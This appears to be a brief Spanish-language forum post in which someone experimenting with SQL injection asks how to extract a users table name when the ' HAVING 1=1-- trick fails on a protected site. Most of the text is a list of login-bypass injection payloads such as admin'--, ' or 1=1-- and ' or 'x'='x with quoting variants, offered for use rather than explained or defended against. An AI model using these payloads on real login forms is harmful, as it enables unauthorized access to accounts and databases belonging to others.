Estoy probando con sql injection y estoy mirando los articulos que Kriptopolis. Como indica en ellos tenemos que poner ' HAVING 1=1-- en user para que nos de el nombre de la tabla de usuarios, pero si esto no funciona significa que esta protegida. Hay alguna otra manera de hacerlo??
Gracias
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi")or("a"="a